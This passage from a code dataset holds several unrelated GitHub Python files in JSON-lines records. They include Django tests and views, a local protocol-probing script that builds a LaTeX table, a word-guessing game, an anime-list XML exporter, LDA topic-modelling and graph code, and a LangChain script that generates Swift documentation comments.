\"work\",\n \"worm\",\n \"wound\",\n \"wrist\",\n \"writer\",\n \"yard\",\n \"yoke\",\n \"zebra\",\n \"zinc\",\n \"zipper\",\n \"zone\",\n]\n\n\ndef random_name() -> str:\n \"\"\"Generate a random name.\"\"\"\n adjective = random.choice(adjectives)\n noun = random.choice(nouns)\n number = random.randint(1, 100)\n return f\"{adjective}-{noun}-{number}\"\n","repo_name":"langchain-ai/langchain","sub_path":"libs/langchain/langchain/smith/evaluation/name_generation.py","file_name":"name_generation.py","file_ext":"py","file_size_in_byte":9936,"program_lang":"python","lang":"hr","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"} +{"seq_id":"17407102203","text":"from django.test import TestCase\nfrom api.views import classifier, uploadpeople, companyemployees, persons\nfrom api.models import User\nimport time\nimport json\n\n# Create your tests here.\n\nclass PandoraTestCase(TestCase):\n def setUp(self):\n pass\n\n\n def test_classifier(self):\n print(\"Starting Fruits and Vegetables Classifier Test...\")\n\n #Change it to any names it will classify from world's database\n fruitlist = ['grapes','mango','banana','kiwi']\n vegetablelist = ['chilli','eggplant','peas','potato']\n\n for fruit in fruitlist:\n self.assertEqual(classifier(fruit), 'fruit')\n\n for vegetable in vegetablelist:\n self.assertEqual(classifier(vegetable), 'vegetable')\n print(\"Classifier Test Completed\")\n \n \n\n def test_uploadpeople(self):\n print(\"Starting Upload People Data Test...\")\n env = 'test'\n request = ''\n uploadpeople(None, env)\n time.sleep(7)\n users = User.objects.all()\n count = users.count()\n self.assertEqual(count, 3)\n print(\"Upload People Test Completed\")\n\n\n def test_persons(self):\n print(\"Starting Two People given Data Test...\")\n env = 'test'\n request = ''\n uploadpeople(None, env)\n time.sleep(7)\n result = persons(None, persononename=\"Carmella0\", persontwoname=\"Bonnie2\")\n result = json.loads(result.content)\n print(result)\n expected = {'personone': {'id': 1, 'name': 'Carmella Lambert', 'age': 61, 'address': '628 Sumner Place, Sperryville, American Samoa, 9819', 'phone': '+1 (910) 567-3630'}, 'persontwo': {'id': 3, 'name': 'Bonnie Bass', 'age': 54, 'address': '455 Dictum Court, Nadine, Mississippi, 6499', 'phone': '+1 (823) 428-3710'}, 'friends': {2: {'id': 2, 'name': 'Decker Mckenzie', 'eyeColor': 'brown', 'has_died': False}}}\n self.assertEqual(json.dumps(result), json.dumps(expected))\n\n def test_companygiven(self):\n pass\n\n\n\n\n\n\n","repo_name":"sanket135/pandora","sub_path":"api/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7592733956","text":"#!/usr/bin/env python3\n\nimport sys\nimport socket\nimport hashlib\n\nPREFIX_MAX_LENGTH = 1\nSUFFIX_MAX_LENGTH = 1\n\nCOMMANDS = [b\"IACK\\n\", b\"IREQ_0_0_0\\n\", b\"IREQ_0_0_1\\n\", b\"IREQ_0_1_0\\n\",\n b\"IREQ_0_1_1\\n\", b\"IREQ_1_0_0\\n\", b\"IREQ_1_0_1\\n\", b\"IREQ_1_1_0\\n\",\n b\"IREQ_1_1_1\\n\", b\"ISENDFRAME\\n\", b\"ITIMEOUT\\n\"]\n\nif len(sys.argv) >= 2:\n host = sys.argv[1]\n port = int(sys.argv[2])\nelse: # defaults to this on my system\n host = \"localhost\"\n port = 7892\n\ndef gen_traces(cmds,max_length,current=[]):\n \"Generate all combination of commands up to a maximum length\"\n yield current\n if max_length > 0:\n for cmd in cmds:\n for trace in gen_traces(cmds, max_length-1, current + [cmd]):\n yield trace\n\ndef printable_trace(trace):\n if trace:\n return \" \".join([cmd[:-1].decode(\"utf-8\").replace(\"_\",\"-\") for cmd in trace])\n else:\n return \"\\\\textepsilon\"\n\ndef valid_path(path,s):\n s.send(b\"reset\\n\") # reset before every trace\n response = False\n for cmd in path:\n s.send(cmd)\n response = (s.recv(1024))\n if response == b'Oquiescence\\n':\n return False\n if response:\n return response.decode(\"utf-8\")[-6:-1].replace(\"_\",\"-\")\n return False\n\n\nrow_colors = [\"white\",\n \"red!50\",\"blue!50\",\"green!50\",\"yellow!50\",\"magenta!50\",\"cyan!50\",\n \"red!20\",\"blue!20\",\"green!20\",\"yellow!20\",\"magenta!20\",\"cyan!20\",\n \"gray!50\",\"gray!40\",\"gray!30\",\"gray!20\",\"gray!10\",\"gray!0\",]\nrow_colors_index = 0\nrow_dict = {}\n\ndef gen_row_color(seq):\n global row_colors,row_colors_index,row_dict\n if seq in row_dict:\n return row_dict[seq]\n else:\n row_dict[seq] = row_colors[row_colors_index]\n row_colors_index += 1\n return row_dict[seq]\n\n\n\ns = socket.socket()\ns.connect((host,port))\n\nprefix_traces = list(gen_traces(COMMANDS,PREFIX_MAX_LENGTH))\nsuffix_traces = list(gen_traces(COMMANDS,SUFFIX_MAX_LENGTH))\n\nsignature = hashlib.sha1()\n\n# print to stdout latex code for a nice tabl\n\nsys.stdout.write(\"{\\\\footnotesize\")\n# sys.stdout.write(\"{\\\\tiny\")\nsys.stdout.write(\"\\\\begin{longtable}{l |\")\nsys.stdout.write(\" l\"*len(suffix_traces))\nsys.stdout.write(\"}\\n prefix/suffix & \")\nsys.stdout.write(\" & \".join([\"\\\\begin{rotate}{30} %s \\\\end{rotate}\"%printable_trace(t) for t in suffix_traces]))\nsys.stdout.write(\"\\\\\\\\\\n\\\\hline\\n\")\nfor y,prefix in enumerate(prefix_traces):\n suffix_results = [valid_path(prefix + suffix,s) for suffix in suffix_traces]\n sys.stdout.write(\"\\\\rowcolor{%s}\\n\"%gen_row_color(str(suffix_results)))\n sys.stdout.write( printable_trace(prefix))\n signature.update(repr(prefix).encode(\"utf-8\") + repr(suffix_results).encode(\"utf-8\"))\n for x,result in enumerate(suffix_results):\n sys.stdout.write(\" & \\-\" if result else \" & \\\\delta\")\n sys.stdout.write(\"\\\\\\\\\\n\")\ns.close()\n\nsys.stdout.write(\"\\end{longtable}\\n}\\n\")\nsys.stdout.write(\"%% sha1 of table results: %s\"%signature.hexdigest())\n","repo_name":"Witik/CommandlineCalculator","sub_path":"assignment4/brpmodeler.py","file_name":"brpmodeler.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20451302581","text":"import random\n\nLEXICON_FILE = \"Lexicon.txt\" # File to read word list from\nINITIAL_GUESSES = 8 # Initial number of guesses player starts with\n\n\ndef play_game(secret_word):\n \"\"\"\n Add your code (remember to delete the \"pass\" below)\n \"\"\"\n starting_display = len(secret_word) * (\"-\")\n redisplay = ''\n tries_left = INITIAL_GUESSES\n while True:\n print(f'The word now looks like this: {starting_display}')\n print(f'You have {tries_left} guesses left')\n ask_for_letter = input('Type a single letter here, then press enter: ')\n for i in range(len(secret_word)):\n if ask_for_letter.upper() == secret_word[i]:\n starting_display = list(starting_display)\n starting_display[i] = ask_for_letter.upper()\n for x in starting_display:\n redisplay += x\n starting_display = redisplay\n redisplay = ''\n\n if ask_for_letter.upper() in secret_word and len(ask_for_letter.upper()) == 1:\n print(\"That guess is correct\")\n\n if len(ask_for_letter) >= 2 and ask_for_letter.upper() in secret_word:\n tries_left = tries_left\n print('Guess should only be a single character.')\n\n if ask_for_letter.upper() not in secret_word:\n tries_left -= 1\n print(f\"There are no {ask_for_letter.upper()}'s in the word\")\n\n if tries_left == 0:\n print(f\"Sorry, you lost. The secret word was: {secret_word}\")\n break\n\n if starting_display == secret_word:\n print(f\"Congratulations, the word is: {secret_word}\")\n break\n\n\ndef get_word():\n \"\"\"\n This function returns a secret word that the player is trying\n to guess in the game. This function initially has a very small\n list of words that it can select from to make it easier for you\n to write and debug the main game playing program. In Part II of\n writing this program, you will re-implement this function to\n select a word from a much larger list by reading a list of words\n from the file specified by the constant LEXICON_FILE.\n \"\"\"\n file = open(LEXICON_FILE)\n word_list = []\n for line in file:\n line = line[:-1]\n word_list.append(line)\n index = random.randrange(len(word_list))\n word = word_list[index]\n return word\n\n\ndef main():\n \"\"\"\n To play the game, we first select the secret word for the\n player to guess and then play the game using that secret word.\n \"\"\"\n secret_word = get_word()\n play_game(secret_word)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aJanjgava/CS106A-Python","sub_path":"Assignment5/word_guess.py","file_name":"word_guess.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"37110749557","text":"import webapp2\nfrom jinja2 import Environment, FileSystemLoader\n\nJINJA_ENV=Environment(loader=FileSystemLoader(\"\"),\n extensions=[\"jinja2.ext.autoescape\"],\n autoescape=True)\n\nclass MainController(webapp2.RequestHandler):\n def get(self):\n\n template_values = {\n \"world_type\": self.request.get(\"kind\", default_value=\"Pretty\")\n }\n\n template = JINJA_ENV.get_template(\"pretty_template.html\")\n\n self.response.headers[\"Content-Type\"] = \"text/html; charset=utf-8\"\n self.response.write(template.render(template_values))\n\n","repo_name":"ikurilin/AppEngine-DataDownloader","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13934831381","text":"import re\nfrom unittest import result\nfrom pathlib import Path\nfrom tqdm import tqdm\nfrom yattag import Doc, indent\n\ntry:\n f = Path(__file__).with_name('export.txt')\n with f.open('r', encoding=\"utf-8\") as f:\n matches = re.findall(r\"(/)(\\d+)\", f.read())\nexcept FileNotFoundError:\n print(\"Please make sure export.txt exists\")\n exit()\n\ntry:\n f = Path(__file__).with_name('export.txt')\n with f.open('r', encoding=\"utf-8\") as f:\n matches2 = re.findall(r\"(# )([A-Za-z:0-9 !?\\-\\\\'\\\"\\\\\\’,.~\\/!@#$%^&*()_\\+ä;:\\[\\]‘é`]+)\", f.read())\nexcept FileNotFoundError:\n print(\"Please make sure export.txt exists\")\n exit()\n\n\nanimesID = []\nanimeName = []\nfor ids in matches:\n animesID.append(ids[1])\nfor names in matches2:\n animeName.append(names[1])\n\nf2 = open(\"./senpaii.xml\", \"w\", encoding=\"utf-8\")\nf2.write(\"\")\nf2.close()\n\npbar = tqdm(desc=\"Progress\", total= len(animesID))\n\ni=0\ntry:\n \n for animeID in animesID:\n \n doc, tag, text = Doc().tagtext()\n try:\n with tag('root'):\n with tag('anime'):\n with tag('series_animedb_id'):\n text(animeID)\n with tag('series_title'):\n text(animeName[i])\n with tag('series_type'):\n text(\"\")\n with tag('series_episodes'):\n text(\"\")\n with tag('my_id'):\n text(\"0\")\n with tag('my_watched_episodes'):\n text(\"\")\n with tag('my_start_date'):\n text(\"0000-00-00\")\n with tag('my_finish_date'):\n text(\"0000-00-00\")\n with tag('my_rated'):\n text(\"\")\n with tag('my_score'):\n text(\"\")\n with tag('my_dvd'):\n text(\"\")\n with tag('my_storage'):\n text(\"\")\n with tag('my_status'):\n text('Completed')\n with tag('my_comments'):\n text(\"\")\n with tag('my_times_watched'):\n text('0')\n with tag('my_rewatch_value'):\n text('Low')\n with tag('my_tags'):\n text('')\n with tag('my_rewatching'):\n text('0')\n with tag('my_rewatching_ep'):\n text('0')\n with tag('update_on_import'):\n text('1')\n \n result = indent(\n doc.getvalue(),\n indentation = ' '*4,\n newline = '\\n'\n )\n \n f2 = open(\"./senpaii.xml\", \"a\", encoding=\"utf-8\")\n f2.write('\\n')\n f2.write(result)\n f2.write('\\n')\n f2.close\n except (Exception, AttributeError,TypeError,ValueError):\n print(' Something went wrong')\n i = i + 1\n pbar.update()\n \nexcept KeyboardInterrupt:\n pbar.close()\n print(' Downt\\' leawwe me senpai')\n print(' 😣😣😣')\n exit()\n \npbar.close()\n#Hiwwo there... You probably are wondering why this is here... right?\n#Well... to be honest I am trying to figure why and how does this work... but it does the job done :D","repo_name":"darkmastermindz/9animeToMAL","sub_path":"start_instant.py","file_name":"start_instant.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"7"} +{"seq_id":"7485475582","text":"import logging\nfrom typing import List\n\nfrom langchain.chains.summarize import load_summarize_chain\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.text_splitter import Document, RecursiveCharacterTextSplitter\nfrom tree_sitter import Node\nfrom langchain.schema import SystemMessage\nfrom langchain.prompts import PromptTemplate, ChatPromptTemplate, HumanMessagePromptTemplate\nfrom langchain import LLMChain\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\nCHAT_MODEL_NAME = \"gpt-4\"\nMAX_TOKENS = 1024\n\n####################################################################################################################\nFUNCTION_DOC_INSTRUCTION = \"\"\"\nYou generate documentation comments for provided Swift functions, following the official Apple and Swift guidelines. The comment include:\n\n1. A concise description of the function's purpose and data flow.\n2. A list of the function's parameters, with a description for each.\n3. A description of the function's return value, if applicable.\n4. Any additional notes or context, if necessary.\n\nExample function:\ninternal static func _typeMismatch(at path: [CodingKey], expectation: Any.Type, reality: Any) -> DecodingError {\n let description = \"Expected to decode \\(expectation) but found \\(_typeDescription(of: reality)) instead.\"\n return .typeMismatch(expectation, Context(codingPath: path, debugDescription: description))\n}\n\nGenerated comment:\n/// Returns a `.typeMismatch` error describing the expected type.\n///\n/// - parameter path: The path of `CodingKey`s taken to decode a value of this type.\n/// - parameter expectation: The type expected to be encountered.\n/// - parameter reality: The value that was encountered instead of the expected type.\n/// - returns: A `DecodingError` with the appropriate path and debug description.\n\"\"\"\n####################################################################################################################\nFUNCTION_DOC_PROMPT = \"\"\"\nFunction implementation:\n```\n{function_implementation}\n```\n\nPlease provide the documentation comment based on the given function implementation.\n\"\"\"\n####################################################################################################################\nREFINE_PROMPT_TMPL = (\n \"Your job is to produce a final standalone concise documentation comment for a type described by code or comments, \\n\"\n \"following the official Apple and Swift guidelines.\\n\"\n \"The comment include:\\n\"\n \"A concise description of the code's purpose and data flow.\\n\"\n \"Any additional notes or context, if necessary.\\n\"\n \"Every line in your reply should start with ///\\n\"\n \"We have provided an existing documentation up to a certain point: {existing_answer}\\n\"\n \"We have the opportunity to refine the existing documentation with some more context below.\\n\"\n \"------------\\n\"\n \"{text}\\n\"\n \"------------\\n\"\n \"Given the new context, refine the original documentation.\\n\"\n \"If the context isn't useful, return the original documentation.\\n\"\n)\nREFINE_PROMPT = PromptTemplate(\n input_variables=[\"existing_answer\", \"text\"],\n template=REFINE_PROMPT_TMPL,\n)\nprompt_template = \"\"\"Write a concise standalone documentation comment for a type described by code or comments, following the official Apple and Swift guidelines:\n\n\"{text}\"\n\ndocumentation comment where every line starts with ///:\"\"\"\nPROMPT = PromptTemplate(template=prompt_template, input_variables=[\"text\"])\n####################################################################################################################\n\nchat_model = ChatOpenAI(model_name=CHAT_MODEL_NAME, temperature=0, request_timeout=180, max_tokens=MAX_TOKENS)\nsum_chain = load_summarize_chain(chat_model, chain_type=\"refine\", question_prompt=PROMPT, refine_prompt=REFINE_PROMPT)\n\n\ndef wrap_triple_slash_comments(text: str, max_line_length=120):\n lines = text.split(\"\\n\")\n wrapped_lines = []\n\n for line in lines:\n line = line.strip()\n if not line.startswith(\"///\"):\n break\n\n indent = len(line) - len(line.lstrip())\n words = line.split()\n current_line = words[0]\n for word in words[1:]:\n if len(current_line) + len(word) + 1 > max_line_length:\n wrapped_lines.append(current_line)\n current_line = \" \" * indent + \"/// \" + word\n else:\n current_line += f\" {word}\"\n wrapped_lines.append(current_line)\n\n return \"\\n\".join(wrapped_lines)\n\n\ndef generate_function_documentation(function_implementation: str) -> str:\n prompt = ChatPromptTemplate.from_messages(\n [\n SystemMessage(content=FUNCTION_DOC_INSTRUCTION),\n HumanMessagePromptTemplate.from_template(FUNCTION_DOC_PROMPT),\n ]\n )\n\n chain = LLMChain(llm=chat_model, prompt=prompt)\n result = chain({\"function_implementation\": function_implementation})\n return wrap_triple_slash_comments(result[\"text\"])\n\n\ndef chain_summarize(text: str) -> str:\n logger.info(f\"Summarizing text:\\n{text}\")\n try:\n docs = RecursiveCharacterTextSplitter().split_documents([Document(page_content=text)])\n return wrap_triple_slash_comments(sum_chain.run(docs))\n except Exception:\n logger.error(f\"Failed to summarize text:\\n{text}\")\n return \"\"\n\n\ndef generate_function_summary(function: Node) -> str:\n func_body = function.text.decode(\"utf8\")\n if len(func_body.splitlines()) <= 1:\n logger.info(f\"Function/property body is too short, skipping:\\n{func_body}\")\n return \"\"\n\n try:\n return wrap_triple_slash_comments(generate_function_documentation(func_body))\n except Exception as e:\n logger.error(f\"Failed to generate documentation for function:\\n{func_body}\")\n logger.error(e)\n return chain_summarize(func_body)\n\n\ndef generate_combined_summary(summaries: List[str]) -> str:\n combined = (\n \"/// Documentation of all methods and properties in the current type, should not be included in final documentation:\\n///\\n\"\n + \"\\n///\\n\".join(summaries)\n )\n return chain_summarize(combined)\n\n\ndef generate_class_body_summary(class_body: str) -> str:\n return chain_summarize(class_body)\n\n\nif __name__ == \"__main__\":\n # Example usage\n swift_function = \"\"\"\n @usableFromInline\n func typeName(_ type: Any.Type) -> String {\n var name = _typeName(type, qualified: true)\n if let index = name.firstIndex(of: \".\") {\n name.removeSubrange(...index)\n }\n let sanitizedName =\n name\n .replacingOccurrences(\n of: #\"<.+>|\\(unknown context at \\$[[:xdigit:]]+\\)\\.\"#,\n with: \"\",\n options: .regularExpression\n )\n return sanitizedName\n }\n \"\"\"\n\n documentation_comment = chain_summarize(swift_function)\n print(documentation_comment)\n documentation_comment = generate_function_documentation(swift_function)\n print(documentation_comment)\n","repo_name":"Saik0s/SwiftDocAutomator","sub_path":"summarize.py","file_name":"summarize.py","file_ext":"py","file_size_in_byte":6944,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"16776506934","text":"import pandas as pd \nimport re\nimport json\nfrom nltk.tag import pos_tag\nfrom nltk.chunk import conlltags2tree, tree2conlltags\nfrom nltk.stem import WordNetLemmatizer, SnowballStemmer\nfrom nltk.stem.porter import *\nfrom nltk.stem.lancaster import LancasterStemmer\nimport nltk\nimport gensim\nfrom gensim import corpora, models\nimport math\nfrom gensim.test.utils import datapath\nimport json\nimport networkx as nx\nfrom matplotlib.pyplot import figure\nimport matplotlib.pyplot as plt\n\nstopwords = nltk.corpus.stopwords.words('english')\nlemmatizer = WordNetLemmatizer()\nstemmer = SnowballStemmer(\"english\")\np_stemmer = PorterStemmer()\nl_stemmer = LancasterStemmer()\n\n\"\"\" \nREMINDER: TODO: Change this folder to your own folder containing the saved states\nYou might need to increase the ram usage for your IDE to more than 4GB\nDownload saved_state files here https://drive.google.com/file/d/1LdL85edkbR-YW2ZhTDnbRiblUgOnrXOU/view?usp=sharing\nYou require a SMU account\n\"\"\"\nSAVED_STATES_FOLDER = \"/Users/shrmnl/Github/text-mining-g1-7/saved_states/\"\nSAVED_FIGURES = \"/Users/shrmnl/Github/text-mining-g1-7/plt_figures/\"\n\n\ndef getMajorTopic(arr):\n topic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n max_percentage = 0\n topic = -1\n for tup in arr:\n if tup[1] > max_percentage:\n max_percentage = tup[1]\n topic = tup[0]\n major_topic_word = topic_name_id[topic]\n return topic, max_percentage, major_topic_word\n\ndef percentageMapper(arr):\n topic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n result = {}\n for tup in arr:\n name = topic_name_id[tup[0]]\n if result.get(name, False) == False:\n result[name] = 0\n result[name] += tup[1]\n return result\n\n## Lancaster stemmer very harsh not advisable\ndef clean_content_FASTEST(row):\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [l_stemmer.stem(lemmatizer.lemmatize(x.lower(), pos='v')) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## Best and most trusted\ndef clean_content_FAST(row):\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [stemmer.stem(lemmatizer.lemmatize(x.lower(), pos='v')) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## slower but more gentle \ndef clean_content_SLOW(row):\n ## remove html tags\n content = re.sub(\"\\<(.*?)\\>\", \" \", row['content'])\n ## remove non alphanumeric characters\n content = re.sub(\"[^0-9a-zA-Z\\&]+\", \" \", content).split(\" \")\n processed = [p_stemmer.stem(x.lower()) for x in content if x not in stopwords and x.strip() != \"\"]\n return processed\n\n\n## load the process dataframe with lda topics added already\n# df = pd.read_json(f\"{SAVED_STATES_FOLDER}df_processed_lda.json\", orient=\"records\")\ndf = pd.read_csv(\"./covid19_articles_20200914.csv\")\n\n## load dictionary, corpus, and lda model\ndictionary = corpora.Dictionary.load(f\"{SAVED_STATES_FOLDER}dictionary\")\ncorpus_tfidf = corpora.MmCorpus(f\"{SAVED_STATES_FOLDER}corpus\")\nmodel_filepath = datapath(f\"{SAVED_STATES_FOLDER}lda_model\")\nlda_model = models.LdaModel.load(model_filepath)\n\ntopic_name_id = {\n 0: \"Medical\",\n 1: \"Airlines\",\n 2: \"Schools\",\n 3: \"Farming\",\n 4: \"Medical\",\n 5: \"Hollywood\",\n 6: \"Finance\",\n 7: \"India\",\n 8: \"Businesses\",\n 9: \"Football\",\n 10: \"Europe\",\n 11: \"US Politics\",\n 12: \"Finance\",\n 13: \"Automotive\",\n }\n\n## Get distribution per news agency per topic\n# news_agency_topic_distribution = {}\n# for i, row in df.iterrows():\n# news_agency = row[\"domain\"]\n# val = lda_model[corpus_tfidf[i]]\n# topic, max_percentage, topic_name = getMajorTopic(val)\n\n# if news_agency_topic_distribution.get(news_agency, False) == False:\n# news_agency_topic_distribution[news_agency] = {}\n \n# if news_agency_topic_distribution[news_agency].get(topic_name, False) == False:\n# news_agency_topic_distribution[news_agency][topic_name] = 0\n\n# news_agency_topic_distribution[news_agency][topic_name] += 1\n\n# with open(\"news_agency_topic_distribution.json\", \"w+\") as fp:\n# json.dump(news_agency_topic_distribution, fp, indent=2)\n\n\ndef getMaxOf(arr):\n if len(arr) == 1:\n return topic_name_id[arr[0][0]]\n \n best_topic = arr[0]\n for tup in arr:\n if tup[1] > best_topic[1]:\n best_topic = tup\n \n return topic_name_id[best_topic[0]]\n\nfor i, row in df.iterrows():\n df.loc[i, \"lda_topic\"] = getMaxOf(lda_model[corpus_tfidf[i]])\n\n## Create a domain dict with the respective weights for the various topics\ndomains = df.domain.unique().tolist()\nlda_topics = df['lda_topic'].unique().tolist()\n\nweight_domain_dict = {}\nfor domain in domains:\n valueCounts = df[df[\"domain\"] == domain].lda_topic.value_counts()\n active_topics = valueCounts.index.tolist()\n active_topic_values = valueCounts.tolist()\n if weight_domain_dict.get(domain, False) == False:\n weight_domain_dict[domain] = {}\n weight_domain_dict[domain][\"total_articles\"] = sum(active_topic_values)\n\n for i in range(len(active_topics)):\n weight_domain_dict[domain][active_topics[i]] = active_topic_values[i]\n\nfor domain in weight_domain_dict.keys():\n sub_dict = weight_domain_dict[domain]\n for topic, count in sub_dict.items():\n if topic != \"total_articles\":\n percentage = count / sub_dict[\"total_articles\"]\n sub_dict[topic] = {\n \"count\": count,\n \"percentage\": percentage,\n }\n\n# json.dump(weight_domain_dict, open(\"weight_domain_dict.json\", \"w+\"), indent=2) \n\nG = nx.Graph()\n## Example:\n## G.add_edge(\"a\", \"b\", weight=0.6)\n\n## Filter weight_domain_dict\n# targetted_companies = ['cnn', 'theguardian', 'nature', 'scientificamerican', 'nytimes','cnbc', 'bbc','scmp', 'reuters', 'finance.yahoo','theverge','independent', 'newyorker','japantimes','hbr']\ntargetted_companies = df.domain.unique().tolist()\nweight_domain_dict = {k: v for k,v in weight_domain_dict.items() if k in targetted_companies}\n\nfor i in range(len(weight_domain_dict.keys())):\n domains = list(weight_domain_dict.keys())\n target_domain_name = domains[i]\n other_domains = domains[:i] + domains[i + 1:]\n domain = weight_domain_dict[target_domain_name]\n\n for other_domain_name in other_domains:\n other_domain = weight_domain_dict[other_domain_name]\n other_domain_topics = list(other_domain.keys())\n\n for topic in list(domain.keys())[1:]:\n if other_domain.get(topic, False):\n if G.get_edge_data(target_domain_name, other_domain_name) == None:\n G.add_edge(target_domain_name, other_domain_name, weight=0)\n old_weight = G.get_edge_data(target_domain_name, other_domain_name)[\"weight\"]\n new_weight = old_weight + min(domain[topic][\"count\"], other_domain[topic][\"count\"])\n\n G.add_edge(target_domain_name, other_domain_name, weight=new_weight)\n\nnx.write_graphml_lxml(G, \"results/news_agencies_network_lda.graphml\")\n\n## Graphing code no need to edit below\nplt.figure(figsize=(100,100))\n# edge_list = [(u, v) for (u, v, d) in G.edges(data=True)]\n# pos = nx.spring_layout(G, k=5, iterations=20)\n# nx.draw_networkx_nodes(G, pos, node_size=60)\n# nx.draw_networkx_edges(G, pos, edgelist=edge_list, width=1)\n# nx.draw_networkx_labels(G, pos, font_size=10, font_family=\"sans-serif\")\nnx.draw(G, with_labels=True, node_size=60)\nplt.axis(\"off\")\n# plt.show()\nplt.savefig(\"results/news_agencies_network_lda.png\")","repo_name":"shermanleejm/text-mining-g1-7","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":8290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21100985852","text":"# Create your views here.\n# -*- coding: UTF-8 -*-\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.http import HttpResponse,HttpResponseRedirect\nimport datetime\nfrom lib_manage.models import Book,Author\nfrom django.template import Context\nfrom django.shortcuts import render_to_response\n\ndef hello(request):\n return HttpResponse(\"Hello world\")\n\ndef current_datetime(request):\n now = datetime.datetime.now()\n #html = \"It is now %s.\" % now\n return HttpResponse(now)\n \ndef current_datetime2(request):\n now = datetime.datetime.now()\n c = Context({'time':now})\n return render_to_response(\"time.html\", c)\n \ndef main(request):\n return render_to_response(\"welcome.html\")\n \ndef addBook(request):\n if request.POST:\n post = request.POST\n try:\n authorid = Author.objects.get(Name = post[\"Authorname\"])\n new_Book = Book(\n Title = post[\"Title\"],\n AuthorID = authorid,\n Publisher = post[\"Publisher\"],\n PublishDate = post[\"PublishDate\"], \n Price = post[\"Price\"]\n )\n new_Book.save()\n #q = Author.AuthorID()\n \n return HttpResponseRedirect(\"/addBook/\") \n except ObjectDoesNotExist:\n return HttpResponseRedirect(\"/addAuthor/\") \n \n\n return render_to_response(\"addbook.html\")\n \ndef addAuthor(request):\n if request.POST:\n post = request.POST\n new_Author = Author( \n Name = post[\"Name\"],\n Age = post[\"Age\"],\n Country = post[\"Country\"] \n )\n new_Author.save() \n return HttpResponseRedirect(\"/addBook/\") \n return render_to_response(\"addAuthor.html\")\n\n\ndef Search(request):\n if 'query' in request.GET and request.GET['query']:\n tmp = request.GET['query']\n try:\n person = Author.objects.get(Name = tmp)#模糊查找\n book_list = person.book_set.all()\n c = Context({\"book_list\":book_list,\"query\":person.Name,})\n except ObjectDoesNotExist:\n book_list = None\n person = None\n c = Context({\"book_list\":book_list,\"query\":person,})\n return render_to_response('AllBooks.html', c)\n #showBooks(tmp)\n return render_to_response('Search.html')\n\n#def showBooks(request):\n #global tmp\n\n \ndef details(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n c = Context({\"book\":book,\"author\":author,})\n return render_to_response('details.html',c)\n \ndef delete(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n book.delete()\n try:\n Book.objects.filter(AuthorID = author.AuthorID)\n except ObjectDoesNotExist:\n author.delete()\n return HttpResponseRedirect(\"/search/\")\n \ndef update(request):\n ID = request.GET[\"id\"]\n book = Book.objects.get(ISBN = ID)\n #author = Author.objects.filter(AuthorID = book.AuthorID.AuthorID)\n author = book.AuthorID\n if request.POST:\n post = request.POST\n #book.AuthorID = author\n book.Publisher = post[\"Publisher\"]\n book.PublishDate = post[\"PublishDate\"]\n book.Price = post[\"Price\"]\n #author.AuthorID = post[\"AuthorID\"]\n author.Name = post[\"Name\"]\n author.Age = post[\"Age\"]\n author.Country = post[\"Country\"] \n book.save()\n author.save()\n return render_to_response('update.html')\n \n \n \n \n","repo_name":"nameleiyu/Lab4","sub_path":"lib_manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"25586776194","text":"# -*- coding: utf-8 -*-\n# ====================================== #\n# @Author : Yanbo Han\n# @Email : yanbohan98@gmail.com\n# @File : fileprase.py\n# ALL RIGHTS ARE RESERVED UNLESS STATED.\n# ====================================== #\n\nimport logging\nimport os\nimport re\n\nfrom ase.units import Hartree, eV\n\n\nclass CalculationResultError(Exception):\n pass\n\n\nclass G16LogFiles(object):\n r\"\"\"\n .log File parser for g16 calculation result.\n\n Attributes\n ----------\n content:dict\n dict consist of all useful contents in the file.\n \"\"\"\n\n def 